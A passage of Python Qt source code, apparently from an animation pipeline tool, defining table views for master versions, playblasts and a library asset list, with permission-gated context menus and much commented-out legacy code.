menu.exec_(event.globalPos())
event.accept()
return
def delete(self, node):
if massage.warning("warning", "Delete", "Are you sure you want to delete these versions?"):
if isinstance(node, list):
for n in node:
n.delete()
self.parent.current_component.refresh()
# logger.info(self.parent.current_component.name)
def explore(self, node):
if isinstance(node, list):
node[0].explore()
def reference_(self, node):
if isinstance(node, list):
node[0].reference_()
def import_(self, node):
if isinstance(node, list):
node[0].import_()
# def deletActionClicked(self):
# # This slot will be called when our button is clicked.
# # self.sender() returns a refence to the QPushButton created
# # by the delegate, not the delegate itself.
# button = self.sender().parent()
# index = self.indexAt(button.pos())
# index = self.model().mapToSource(index)
# self.model().sourceModel().getNode(index).delete_me()
def asModelIndex(self, index):
return self.proxyModel.mapToSource(index)
def asModelNode(self, index):
return self.sourceModel.getNode(index)
@property
def proxyModel(self):
return self._proxyModel
@proxyModel.setter
def proxyModel(self, model):
self._proxyModel = model
@property
def sourceModel(self):
return self._sourceModel
@sourceModel.setter
def sourceModel(self, model):
self._sourceModel = model
class Masters_View(Versions_View):
def __init__(self, parentWidget=None, parent=None, settings = None):
super(Masters_View, self).__init__(parentWidget, parent, settings)
def setModel_(self, model=None):
self.clearModel()
if model:
# model._rowHeight = self._slider.listSlider.value()
self._proxyModel = models.Masters_ProxyModel()
self._proxyModel.setSourceModel(model)
self._proxyModel.setDynamicSortFilter(True)
self._proxyModel.setSortRole(models.Versions_Model.sortRole)
self.setModel(self._proxyModel)
# self.setIndentation(0)
self.proxyModel = self.model()
self.sourceModel = self.proxyModel.sourceModel()
self.horizontalHeader().resizeSection(0, 32) # self._slider.listSlider.value())
QtCompat.setSectionResizeMode(self.horizontalHeader(), 0, QtWidgets.QHeaderView.Fixed)
# self.horizontalHeader().resizeSection(1, 32)
# QtCompat.setSectionResizeMode(self.horizontalHeader(), 1, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().setStretchLastSection(False)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 1, QtWidgets.QHeaderView.Stretch)
self.horizontalHeader().resizeSection(2, 60)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 2, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().resizeSection(3, 110)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 3, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().resizeSection(4, 80)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 4, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().resizeSection(5, 60)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 5, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().resizeSection(6, 32)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 6, QtWidgets.QHeaderView.Fixed)
row_del = HoverDelegate(self)
note_del = NoteDelegate(self)
load_del = loadButtonDelegate(self)
self.hover_signal.connect(row_del.hover_signal_change)
self.hover_signal.connect(note_del.hover_signal_change)
self.hover_signal.connect(load_del.hover_signal_change)
self.setItemDelegate(row_del)
# setup the buttons for loading and more options with delegates
self.setItemDelegateForColumn(6, load_del)
# note delegate
self.setItemDelegateForColumn(1, note_del)
# setup the buttons for loading and more options with delegates
# self.setItemDelegateForColumn(6, loadButtonDelegate(self))
# self.setItemDelegateForColumn(1, NoteDelegate(self))
# self.setItemDelegateForColumn(0, Standard_table_Delegate(self))
# self.setItemDelegateForColumn(2, Standard_table_Delegate(self))
# self.setItemDelegateForColumn(3, Standard_table_Delegate(self))
# self.setItemDelegateForColumn(4, Standard_table_Delegate(self))
# self.setItemDelegateForColumn(5, Standard_table_Delegate(self))
self.sortByColumn(0, QtCore.Qt.DescendingOrder)
self.verticalHeader().setDefaultSectionSize(32)
'''
This is to hide the author column if no users are in the active project
'''
if not self.parent.project.users:
self.setColumnHidden(4, True)
else:
self.setColumnHidden(4, False)
if model.items[0].number == 0:
self.setColumnHidden(0, True)
else:
self.setColumnHidden(0, False)
def contextMenuEvent(self, event):
handled = True
index = self.indexAt(event.pos())
menu = QtWidgets.QMenu()
node = None
if index.isValid():
src = self.asModelIndex(index)
node = self.asModelNode(src)
rows = self.selectionModel().selectedRows()
if rows:
node = [self.asModelNode(self.asModelIndex(r)) for r in rows]
actions = list()
def_actions = list()
if node:
# if node.typeInfo() == cfg._version_:
if isinstance(node, list):
if len(node) == 1:
if node[0].number is not 0:
if self.permissions.has_permissions(role_string=self.role(), action=self.permissions.revert_master):
actions.append(QtWidgets.QAction("Revert master to {}".format(node[0].fullName), menu, triggered=functools.partial(self.revert_, node)))
if self.permissions.has_permissions(role_string=self.role(), action=self.permissions.reference_version):
actions.append(QtWidgets.QAction("Reference {} into the current scene".format(node[0].fullName), menu,triggered=functools.partial(self.reference_, node)))
if self.permissions.has_permissions(role_string=self.role(), action=self.permissions.import_version):
actions.append(QtWidgets.QAction("Import {} into the current scene".format(node[0].fullName), menu,triggered=functools.partial(self.import_, node)))
if self.permissions.has_permissions(role_string=self.role(), action=self.permissions.delete):
actions.append(QtWidgets.QAction("Delete...", menu,triggered=functools.partial(self.delete, node)))
def_actions.append(QtWidgets.QAction("Explore...", menu,
triggered=functools.partial(self.explore, node)))
else:
if self.parent.current_component:
pass
# actions.append(QtWidgets.QAction("Explore...", menu,
# triggered=functools.partial(self.explore, self.parent.current_component)))
else:
event.accept()
return
menu.addActions(actions)
menu.addSeparator()
menu.addActions(def_actions)
menu.setStyleSheet(self.css)
menu.exec_(event.globalPos())
event.accept()
return
def revert_(self, node):
if isinstance(node, list):
msg = "Are you sure you want to revert your master to {}?".format(node[0].fullName)
prompt = massage.PromptUser(self, prompt=msg, override_yes_text="Yes", override_no_label="No")
result = prompt.exec_()
# logger.info(result)
# logger.info()
if result == 0:
node[0].revert_()
# self.update()
# def setModel_(self, model=None):
# self.clearModel()
# if model:
# model._rowHeight = self._slider.listSlider.value()
# self._proxyModel = models.Masters_ProxyModel()
# self._proxyModel.setSourceModel(model)
# self._proxyModel.setDynamicSortFilter(True)
# self._proxyModel.setSortRole(models.Masters_Model.sortRole)
# self.setModel(self._proxyModel)
#
# self.setIndentation(0)
# self.expandAll()
#
# self.header().resizeSection(0, self._slider.listSlider.value())
#
# QtCompat.setSectionResizeMode(self.header(), 0, QtWidgets.QHeaderView.Fixed)
# self.header().resizeSection(1, 32)
#
# QtCompat.setSectionResizeMode(self.header(), 1, QtWidgets.QHeaderView.Fixed)
#
# self.header().setStretchLastSection(False)
#
#
# QtCompat.setSectionResizeMode(self.header(), 2, QtWidgets.QHeaderView.Stretch)
# QtCompat.setSectionResizeMode(self.header(), 3, QtWidgets.QHeaderView.Stretch)
# QtCompat.setSectionResizeMode(self.header(), 4, QtWidgets.QHeaderView.Stretch)
#
# self.header().resizeSection(5, 50)
#
# QtCompat.setSectionResizeMode(self.header(), 5, QtWidgets.QHeaderView.Fixed)
# self.header().resizeSection(6, 32)
#
# QtCompat.setSectionResizeMode(self.header(), 6, QtWidgets.QHeaderView.Fixed)
# self.header().resizeSection(7, 32)
#
# QtCompat.setSectionResizeMode(self.header(), 7, QtWidgets.QHeaderView.Fixed)
#
# self.setItemDelegateForColumn(7, loadButtonDelegate(self))
#
# self.sortByColumn(1, QtCore.Qt.DescendingOrder)
#
# self.proxyModel = self.model()
# self.sourceModel = self.proxyModel.sourceModel()
# # self.update()
# def MultiButtonClicked(self):
# # This slot will be called when our button is clicked.
# # self.sender() returns a refence to the QPushButton created
# # by the delegate, not the delegate itself.
# button = self.sender()
# index = self.indexAt(button.pos())
# index = self.model().mapToSource(index)
# if self.model().sourceModel().getNode(index).typeInfo() == cfg._new_:
# parent_index = index.parent()
# node = self.model().sourceModel().getNode(index).parent()
# self.model().sourceModel().removeRows(index.row(), 1, parent_index)
# node.initialVersion()
# else:
# self.model().sourceModel().getNode(index).load()
# self.parent.set_thumbnail(self.model().sourceModel().getNode(index).resource)
# self.parent.version = self.model().sourceModel().getNode(index)
# self.setCurrentIndex(self.model().mapFromSource(index))
# for btn in self._buttons:
# btn.setIcon(QtGui.QIcon(cfg.open_icon))
#
# button.setIcon(QtGui.QIcon(cfg.reload_icon))
# # try:
# # version_buttons = self.parent.versionsView._buttons
# # for btn in self.version_buttons:
# # btn.setIcon(QtGui.QIcon(cfg.open_icon))
# # except:
# # print "can not reset versions table"
#
# def contextMenuEvent(self, event):
#
# handled = True
# index = self.indexAt(event.pos())
# menu = QtWidgets.QMenu()
# node = None
#
# if index.isValid():
# src = self.asModelIndex(index)
# node = self.asModelNode(src)
#
# actions = []
#
# if node and not node._deathrow:
#
# if node.typeInfo() == cfg._master_:
#
# actions.append(QtWidgets.QAction("Explore...", menu,
# triggered=functools.partial(self.explore, src)))
# else:
#
# event.accept()
# return
#
# else:
# event.accept()
# return
#
# menu.addActions(actions)
#
# menu.exec_(event.globalPos())
# event.accept()
#
# return
class Playblasts_View(Versions_View):
def __init__(self, parentWidget=None, parent=None, settings = None):
super(Playblasts_View, self).__init__(parentWidget, parent, settings)
def setModel_(self, model=None):
self.clearModel()
if model:
self._proxyModel = models.Playblasts_ProxyModel()
self._proxyModel.setSourceModel(model)
self._proxyModel.setDynamicSortFilter(True)
self._proxyModel.setSortRole(models.Versions_Model.sortRole)
self.setModel(self._proxyModel)
# self.setIndentation(0)
self.proxyModel = self.model()
self.sourceModel = self.proxyModel.sourceModel()
self.horizontalHeader().resizeSection(0, 32) # self._slider.listSlider.value())
QtCompat.setSectionResizeMode(self.horizontalHeader(), 0, QtWidgets.QHeaderView.Fixed)
# self.horizontalHeader().resizeSection(1, 32)
# QtCompat.setSectionResizeMode(self.horizontalHeader(), 1, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().setStretchLastSection(False)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 1, QtWidgets.QHeaderView.Stretch)
self.horizontalHeader().resizeSection(2, 110)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 2, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().resizeSection(3, 80)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 3, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().resizeSection(4, 60)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 4, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().resizeSection(5, 32)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 5, QtWidgets.QHeaderView.Fixed)
row_del = HoverDelegate(self)
note_del = NoteDelegate(self)
load_del = loadButtonDelegate(self)
self.hover_signal.connect(row_del.hover_signal_change)
self.hover_signal.connect(note_del.hover_signal_change)
self.hover_signal.connect(load_del.hover_signal_change)
self.setItemDelegate(row_del)
# setup the buttons for loading and more options with delegates
self.setItemDelegateForColumn(5, load_del)
# note delegate
self.setItemDelegateForColumn(1, note_del)
# # setup the buttons for loading and more options with delegates
# self.setItemDelegateForColumn(5, loadButtonDelegate(self))
# self.setItemDelegateForColumn(1, NoteDelegate(self))
# self.setItemDelegateForColumn(0, Standard_table_Delegate(self))
# self.setItemDelegateForColumn(2, Standard_table_Delegate(self))
# self.setItemDelegateForColumn(3, Standard_table_Delegate(self))
# self.setItemDelegateForColumn(4, Standard_table_Delegate(self))
self.sortByColumn(0, QtCore.Qt.DescendingOrder)
self.verticalHeader().setDefaultSectionSize(32)
'''
This is to hide the author column if no users are in the active project
'''
if not self.parent.project.users:
self.setColumnHidden(4, True)
else:
self.setColumnHidden(4, False)
if model.items[0].number == 0:
self.setColumnHidden(0, True)
else:
self.setColumnHidden(0, False)
# self._proxyModel = models.Masters_ProxyModel()
# self._proxyModel.setSourceModel(model)
#
# self._proxyModel.setDynamicSortFilter(True)
# self._proxyModel.setSortRole(models.Versions_Model.sortRole)
# self.setModel(self._proxyModel)
# self._proxyModel = models.Playblasts_ProxyModel()
# self._proxyModel.setSourceModel(model)
# self._proxyModel.setDynamicSortFilter(True)
# self._proxyModel.setSortRole(models.Versions_Model.sortRole)
# self.setModel(self._proxyModel)
# model._rowHeight = self._slider.listSlider.value()
# self.setIndentation(0)
# self.expandAll()
# self.header().resizeSection(0, self._slider.listSlider.value())
# QtCompat.setSectionResizeMode(self.header(), 0, QtWidgets.QHeaderView.Fixed)
# self.header().resizeSection(1, 32)
#
# QtCompat.setSectionResizeMode(self.header(), 1, QtWidgets.QHeaderView.Fixed)
#
# self.header().setStretchLastSection(False)
#
#
# QtCompat.setSectionResizeMode(self.header(), 2, QtWidgets.QHeaderView.Stretch)
# QtCompat.setSectionResizeMode(self.header(), 3, QtWidgets.QHeaderView.Stretch)
# QtCompat.setSectionResizeMode(self.header(), 4, QtWidgets.QHeaderView.Stretch)
# self.header().resizeSection(5, 32)
#
# QtCompat.setSectionResizeMode(self.header(), 5, QtWidgets.QHeaderView.Fixed)
# self.header().resizeSection(6, 32)
# QtCompat.setSectionResizeMode(self.header(), 6, QtWidgets.QHeaderView.Fixed)
#
#
# self.setItemDelegateForColumn(6, loadButtonDelegate(self))
#
# self.sortByColumn(1, QtCore.Qt.DescendingOrder)
#
# self.proxyModel = self.model()
# self.sourceModel = self.proxyModel.sourceModel()
# self.update()
def contextMenuEvent(self, event):
handled = True
index = self.indexAt(event.pos())
menu = QtWidgets.QMenu()
node = None
if index.isValid():
src = self.asModelIndex(index)
node = self.asModelNode(src)
rows = self.selectionModel().selectedRows()
if rows:
node = [self.asModelNode(self.asModelIndex(r)) for r in rows]
actions = list()
def_actions = list()
if node:
# if node.typeInfo() == cfg._version_:
if isinstance(node, list):
if len(node) == 1:
if node[0].number is not 0:
if self.permissions.has_permissions(role_string=self.role(), action=self.permissions.revert_master):
actions.append(QtWidgets.QAction("Revert master playblast to {}".format(node[0].fullName), menu,triggered=functools.partial(self.revert_, node)))
pass
if self.permissions.has_permissions(role_string=self.role(), action=self.permissions.delete):
actions.append(QtWidgets.QAction("Delete...", menu, triggered=functools.partial(self.delete, node)))
def_actions.append(QtWidgets.QAction("Explore...", menu, triggered=functools.partial(self.explore, node)))
else:
if self.parent.current_component:
pass
# actions.append(QtWidgets.QAction("Explore...", menu,
# triggered=functools.partial(self.explore, self.parent.current_component)))
else:
event.accept()
return
menu.addActions(actions)
menu.addSeparator()
menu.addActions(def_actions)
menu.setStyleSheet(self.css)
menu.exec_(event.globalPos())
event.accept()
return
def MultiButtonClicked(self):
# This slot will be called when our button is clicked.
# self.sender() returns a refence to the QPushButton created
# by the delegate, not the delegate itself.
button = self.sender()
index = self.indexAt(button.pos())
index = self.model().mapToSource(index)
if self.model().sourceModel().getNode(index).typeInfo() == cfg._playblast_:
parent_index = index.parent()
node = self.model().sourceModel().getNode(index)
# self.model().sourceModel().removeRows(index.row(),1, parent_index)
node.play()
def revert_(self, node):
if isinstance(node, list):
msg = "Are you sure you want to revert your master playblast to {}?".format(node[0].fullName)
prompt = massage.PromptUser(self, prompt=msg, override_yes_text="Yes", override_no_label="No")
result = prompt.exec_()
# logger.info(result)
# logger.info()
if result == 0:
node[0].revert_()
# node[0].revert_()
# else:
# self.model().sourceModel().getNode(index).load()
# self.parent.set_thumbnail(self.model().sourceModel().getNode(index).resource)
# self.parent.version = self.model().sourceModel().getNode(index)
# self.setCurrentIndex(self.model().mapFromSource(index))
# def contextMenuEvent(self, event):
#
# handled = True
# index = self.indexAt(event.pos())
# menu = QtWidgets.QMenu()
# node = None
#
# if index.isValid():
# src = self.asModelIndex(index)
# node = self.asModelNode(src)
#
# actions = []
#
# if node and not node._deathrow:
#
# if node.typeInfo() == cfg._playblast_:
#
# actions.append(QtWidgets.QAction("Explore...", menu,
# triggered=functools.partial(self.explore, src)))
# else:
#
# event.accept()
# return
#
# else:
# event.accept()
# return
#
# menu.addActions(actions)
#
# menu.exec_(event.globalPos())
# event.accept()
#
# return
class Library_View(Versions_View):
def __init__(self, parentWidget=None, parent=None, settings = None):
super(Library_View, self).__init__(parentWidget, parent, settings)
self.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)
def setModel_(self, model=None):
self.clearModel()
if model:
# model._rowHeight = self._slider.listSlider.value()
self._proxyModel = models.Simple_ProxyModel()
self._proxyModel.setSourceModel(model)
self._proxyModel.setDynamicSortFilter(True)
self._proxyModel.setSortRole(models.Versions_Model.sortRole)
self.setModel(self._proxyModel)
# self.setIndentation(0)
self.proxyModel = self.model()
self.sourceModel = self.proxyModel.sourceModel()
self.horizontalHeader().resizeSection(0, 32) # self._slider.listSlider.value())
QtCompat.setSectionResizeMode(self.horizontalHeader(), 0, QtWidgets.QHeaderView.Fixed)
# self.horizontalHeader().resizeSection(1, 32)
# QtCompat.setSectionResizeMode(self.horizontalHeader(), 1, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().setStretchLastSection(False)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 1, QtWidgets.QHeaderView.Stretch)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 2, QtWidgets.QHeaderView.Stretch)
self.horizontalHeader().resizeSection(3, 32)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 3, QtWidgets.QHeaderView.Fixed)
# self.horizontalHeader().resizeSection(4, 40)
# QtCompat.setSectionResizeMode(self.horizontalHeader(), 4, QtWidgets.QHeaderView.Fixed)
#
# self.horizontalHeader().resizeSection(5, 50)
# QtCompat.setSectionResizeMode(self.horizontalHeader(), 5, QtWidgets.QHeaderView.Fixed)
#
# self.horizontalHeader().resizeSection(6, 32)
# QtCompat.setSectionResizeMode(self.horizontalHeader(), 6, QtWidgets.QHeaderView.Fixed)
# setup the buttons for loading and more options with delegates
self.setItemDelegateForColumn(3, Library_delegate(self))
# self.setItemDelegateForColumn(0, Standard_table_Delegate(self))
# self.setItemDelegateForColumn(1, Standard_table_Delegate(self))
# self.setItemDelegateForColumn(2, Standard_table_Delegate(self))
# self.setItemDelegateForColumn(1, NoteDelegate(self))
self.sortByColumn(1, QtCore.Qt.DescendingOrder)
self.verticalHeader().setDefaultSectionSize(32)
'''
This is to hide the author column if no users are in the active project
'''
# if not self.parent.project.users:
# self.setColumnHidden( 4, True)
# else:
# self.setColumnHidden(4, False)
#
# if model.items[0].number == 0:
# self.setColumnHidden(0, True)
# else:
# self.setColumnHidden(0, False)
def contextMenuEvent(self, event):
handled = True
index = self.indexAt(event.pos())
menu = QtWidgets.QMenu()
node = None
if index.isValid():
src = self.asModelIndex(index)
node = self.asModelNode(src)
# node = self.asModelNode(id)
top_actions = list()
def_actions = list()
if node:
if self.permissions.has_permissions(role_string=self.role(), action=self.permissions.reference_version):
def_actions.append(QtWidgets.QAction("Reference to current scene", menu, triggered=functools.partial(self.reference, node)))
def_actions.append(QtWidgets.QAction("Explore...", menu,
triggered=functools.partial(self.explore, node)))
else:
event.accept()
return
menu.addActions(top_actions)
menu.addSeparator()
menu.addActions(def_actions)
menu.setStyleSheet(self.css)
menu.exec_(event.globalPos())
event.accept()
def explore(self, node):
if node:
try:
node.master_model().items[0].explore()
except:
pass
def reference(self, node):
if node:
try:
node.master_model().items[0].reference()
except:
pass
def MultiButtonClicked(self):
# This slot will be called when our button is clicked.
# self.sender() returns a refence to the QPushButton created
# by the delegate, not the delegate itself.
button = self.sender()
index = self.indexAt(button.pos())
index = self.model().mapToSource(index)
self.model().sourceModel().getNode(index).master_model().items[0].reference()
# self.update()
# def setModel_(self, model=None):
# self.clearModel()
# if model:
# model._rowHeight = self._slider.listSlider.value()
# self._proxyModel = models.Masters_ProxyModel()
# self._proxyModel.setSourceModel(model)
# self._proxyModel.setDynamicSortFilter(True)
# self._proxyModel.setSortRole(models.Masters_Model.sortRole)
# self.setModel(self._proxyModel)
#
# self.setIndentation(0)
# self.expandAll()
#
# self.header().resizeSection(0, self._slider.listSlider.value())
#
# QtCompat.setSectionResizeMode(self.header(), 0, QtWidgets.QHeaderView.Fixed)
# self.header().resizeSection(1, 32)
#
# QtCompat.setSectionResizeMode(self.header(), 1, QtWidgets.QHeaderView.Fixed)
#
# self.header().setStretchLastSection(False)
#
#
# QtCompat.setSectionResizeMode(self.header(), 2, QtWidgets.QHeaderView.Stretch)
# QtCompat.setSectionResizeMode(self.header(), 3, QtWidgets.QHeaderView.Stretch)
# QtCompat.setSectionResizeMode(self.header(), 4, QtWidgets.QHeaderView.Stretch)
#
# self.header().resizeSection(5, 50)
#
# QtCompat.setSectionResizeMode(self.header(), 5, QtWidgets.QHeaderView.Fixed)
# self.header().resizeSection(6, 32)
#
# QtCompat.setSectionResizeMode(self.header(), 6, QtWidgets.QHeaderView.Fixed)
# self.header().resizeSection(7, 32)
#
# QtCompat.setSectionResizeMode(self.header(), 7, QtWidgets.QHeaderView.Fixed)
#
# self.setItemDelegateForColumn(7, loadButtonDelegate(self))
#
# self.sortByColumn(1, QtCore.Qt.DescendingOrder)
#
# self.proxyModel = self.model()
# self.sourceModel = self.proxyModel.sourceModel()
# # self.update()
# def MultiButtonClicked(self):
# # This slot will be called when our button is clicked.
# # self.sender() returns a refence to the QPushButton created
# # by the delegate, not the delegate itself.
# button = self.sender()
# index = self.indexAt(button.pos())
# index = self.model().mapToSource(index)
# if self.model().sourceModel().getNode(index).typeInfo() == cfg._new_:
# parent_index = index.parent()
# node = self.model().sourceModel().getNode(index).parent()
# self.model().sourceModel().removeRows(index.row(), 1, parent_index)
# node.initialVersion()
# else:
# self.model().sourceModel().getNode(index).load()
# self.parent.set_thumbnail(self.model().sourceModel().getNode(index).resource)
# self.parent.version = self.model().sourceModel().getNode(index)
# self.setCurrentIndex(self.model().mapFromSource(index))
# for btn in self._buttons:
# btn.setIcon(QtGui.QIcon(cfg.open_icon))
#
# button.setIcon(QtGui.QIcon(cfg.reload_icon))
# # try:
# # version_buttons = self.parent.versionsView._buttons
# # for btn in self.version_buttons:
# # btn.setIcon(QtGui.QIcon(cfg.open_icon))
# # except:
# # print "can not reset versions table"
#
# def contextMenuEvent(self, event):
#
# handled = True
# index = self.indexAt(event.pos())
# menu = QtWidgets.QMenu()
# node = None
#
# if index.isValid():
# src = self.asModelIndex(index)
# node = self.asModelNode(src)
#
# actions = []
#
# if node and not node._deathrow:
#
# if node.typeInfo() == cfg._master_:
#
# actions.append(QtWidgets.QAction("Explore...", menu,
# triggered=functools.partial(self.explore, src)))
# else:
#
# event.accept()
# return
#
# else:
# event.accept()
# return
#
# menu.addActions(actions)
#
# menu.exec_(event.globalPos())
# event.accept()
#
# return
class IconScaleSlider(QtWidgets.QWidget):
def __init__(self, parent):
super(IconScaleSlider, self).__init__(parent)
self.large_lable = QtWidgets.QLabel()
self.large_lable.setMaximumSize(QtCore.QSize(16, 16))
self.large_lable.setPixmap(cfg.large_icon)
self.small_lable = QtWidgets.QLabel()
self.small_lable.setMaximumSize(QtCore.QSize(16, 16))
self.small_lable.setPixmap(cfg.small_icon)
self.slideWidget = QtWidgets.QWidget()
self.slideWidget.setMaximumHeight(20)
self.slideLayout = QtWidgets.QHBoxLayout()
self.slideLayout.setContentsMargins(0, 0, 0, 0)
self.slideLayout.setAlignment(QtCore.Qt.AlignRight)
self.listSlider = QtWidgets.QSlider()
self.listSlider.setOrientation(QtCore.Qt.Horizontal)
self.listSlider.setMaximumWidth(80)
self.listSlider.setMinimumWidth(80)
self.listSlider.setMaximumHeight(25)
self.listSlider.setMinimum(32)
self.listSlider.setMaximum(96)
self.listSlider.setValue(32)
self.slideLayout.addWidget(self.small_lable)
self.slideLayout.addWidget(self.listSlider)
self.slideLayout.addWidget(self.large_lable)
self.setMinimumHeight(25)
self.setLayout(self.slideLayout)
#
# class Project_Tree_View(QtWidgets.QTreeView):
# percentage_complete = QtCore.Signal(int)
# update_view = QtCore.Signal()
#
# def __init__(self, parent=None):
# super(Project_Tree_View, self).__init__(parent)
#
# global counter
#
# # display options
#
# self.setContextMenuPolicy(QtCore.Qt.DefaultContextMenu)
# self.setAlternatingRowColors(True)
# self.setSortingEnabled(True)
# self.setDragEnabled(True)
# self.setAcceptDrops(True)
# self.setDragDropMode(QtWidgets.QAbstractItemView.InternalMove)
# self.setDropIndicatorShown(True)
# self.resizeColumnToContents(True)
#
# # self.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)
#
# # local variables
# self.pipelineUI = self.parent()
# self._ignoreExpentions = False
# self._expended_states = None
# self._userSelection = None
# self._tableView = None
# self._proxyModel = None
# self._sourceModel = None
# self._tree_as_flat_list = None
#
# self.setStyleSheet('''
#
# QTreeView::item:focus {
# }
# QTreeView::item:hover {
# background: #101010;
# }
# QTreeView {
# outline: 0;
# }
# QTreeView::branch:has-siblings:!adjoins-item {
# border-image:url(''' + cfg.vline + ''') 0;
# }
#
# QTreeView::branch:has-siblings:adjoins-item {
# border-image:url(''' + cfg.branch_more + ''') 0;
# }
#
# QTreeView::branch:!has-children:!has-siblings:adjoins-item {
# border-image:url(''' + cfg.branch_end + ''') 0;
# }
#
# QTreeView::branch:has-children:!has-siblings:closed,
# QTreeView::branch:closed:has-children:has-siblings {
# border-image: none;
# image:url(''' + cfg.branch_closed + ''') 0;
# }
#
# QTreeView::branch:open:has-children:!has-siblings,
# QTreeView::branch:open:has-children:has-siblings {
# border-image: none;
# image: url(''' + cfg.branch_open + ''') 0;
# }''')
# #
#
# self.changed = False
# self.update_view.connect(self.model_changed)
#
# def model_changed(self):
# if self.changed == False:
# self.changed = True
#
# def setModel(self, model):
#
# super(Project_Tree_View, self).setModel(model)
#
# if model:
# self.changed = False
#
# self.proxyModel = self.model()
# self.sourceModel = self.proxyModel.sourceModel()
#
# '''
# this will expend the tree only on the first level, which should be
# the projects name folder
# the rest will be collapsed
# '''
#
# self.initialExpension()
#
# '''
# save the expended state of the tree
# '''
# self.saveState()
#
# self.header().setStretchLastSection(False)
# QtCompat.setSectionResizeMode(self.header(), 0, QtWidgets.QHeaderView.Stretch)
#
#
# self.header().resizeSection(1, 100)
# QtCompat.setSectionResizeMode(self.header(), 1, QtWidgets.QHeaderView.Fixed)
#
#
# def initialExpension(self):
# if self.model():
# self.collapseAll()
# return
# for row in range(self.model().rowCount(self.rootIndex())):
# x = self.model().index(row, 0, self.rootIndex())
# self.setExpanded(x, True)
#
# @property
# def tableView(self):
# return self._tableView
#
# @tableView.setter
# def tableView(self, view):
# self._tableView = view
#
# @property
# def proxyModel(self):
# return self._proxyModel
#
# @proxyModel.setter
# def proxyModel(self, model):
# self._proxyModel = model
#
# @property
# def sourceModel(self):
# return self._sourceModel
#
# @sourceModel.setter
# def sourceModel(self, model):
# self._sourceModel = model
#
# @property
# def userSelection(self):
# return self._userSelection
#
# @userSelection.setter
# def userSelection(self, selection):
# self._userSelection = selection
#
# def asProxyIndex(self, index):
# return self.proxyModel.index(0, 0, index)
#
# def asModelIndex(self, index):
# return self.proxyModel.mapToSource(index)
#
# def fromProxyIndex(self, index):
# return self.proxyModel.mapFromSource(index)
#
# def asModelNode(self, index):
# return self.sourceModel.getNode(index)
#
# def modelIndexFromNode(self, node):
# return self.sourceModel.indexFromNode(node, self.rootIndex())
#
# def selectRoot(self):
#
# self.setCurrentIndex(self.asProxyIndex(self.rootIndex()))
# # self.tableView.update(self.selectionModel().selection())
# self.saveSelection()
#
# def saveSelection(self):
#
# if len(self.selectedIndexes()) > 0:
# self.userSelection = self.asModelIndex(self.selectedIndexes()[0])
#
# def saveState(self):
#
# '''
# recursive function to save the expention state fo the tree to a dictionary
# '''
#
# if self._ignoreExpentions == True:
# return
#
# def rec(dict, mdl, index):
#
# for row in range(mdl.rowCount(index)):
#
# i = mdl.index(row, 0, index)
# node = mdl.data(i, 165)
#
# if self.isExpanded(i):
# dict[node] = True
# else:
# dict[node] = False
#
# rec(dict, mdl, i)
#
# self._expended_states = {}
# rec(self._expended_states, self.proxyModel, self.rootIndex())
#
# def restoreState(self):
#
# '''
# recursive function to restore the expention state fo the tree to a dictionary
# '''
#
# def rec(mdl, index):
#
# for row in range(mdl.rowCount(index)):
#
# i = mdl.index(row, 0, index)
# node = mdl.data(i, 165)
#
# if node in self._expended_states:
# if self._expended_states[node] == True:
# self.setExpanded(i, True)
#
# rec(mdl, i)
#
# self.collapseAll()
# rec(self.proxyModel, self.rootIndex())
# self.restoreSelection()
#
# def restoreSelection(self):
#
# index = self.fromProxyIndex(self.userSelection)
# self.select(index)
# self.updateTable(index)
# # self.selectionModel().select(index, QtWidgets.QItemSelectionModel.ClearAndSelect)
#
# def select(self, index):
# '''
# selects a tree branch and expand the parant branch to see the selected branch
# '''
# modelIndex = self.sourceModel.parent(self.asModelIndex(index))
# proxyIndex = self.fromProxyIndex(modelIndex)
# self.setExpanded(proxyIndex, True)
# self.selectionModel().select(index, QtWidgets.QItemSelectionModel.ClearAndSelect)
#
# def dropEvent(self, event):
#
# super(Project_Tree_View, self).dropEvent(event)
# # QTreeView.dropEvent(self, evt)
# if not event.isAccepted():
# # qdnd_win.cpp has weird behavior -- even if the event isn't accepted
# # by target widget, it sets accept() to true, which causes the executed
# # action to be reported as "move", which causes the view to remove the
# # source rows even though the target widget didn't like the drop.
# # Maybe it's better for the model to check drop-okay-ness during the
# # drag rather than only on drop; but the check involves not-insignificant work.
# event.setDropAction(QtCore.Qt.IgnoreAction)
#
# '''
# if the drop is coming from the contents view - this is how i handle this...
# it's UGLY, but for now it's the only way i can make this work...
# '''
# # print event.possibleActions() , "<<"
# if event.source().__class__.__name__ == 'PipelineContentsView':
#
# i = self.indexAt(event.pos())
# model_index = self.asModelIndex(i)
# model_id = self.sourceModel.getNode(model_index).id
# model_node = self.sourceModel.getNode(model_index)
#
# if model_index.isValid():
#
# mime = event.mimeData()
# source = event.source()
#
# item = cPickle.loads(str(mime.data('application/x-qabstractitemmodeldatalist')))
# item_index = self.sourceModel.indexFromNode(item, QtCore.QModelIndex())
# item_parent = self.sourceModel.parent(item_index)
# item_id = item.id
#
# '''
# ignore drops of folders into assets
# '''
# if model_node.typeInfo() == cfg._asset_:
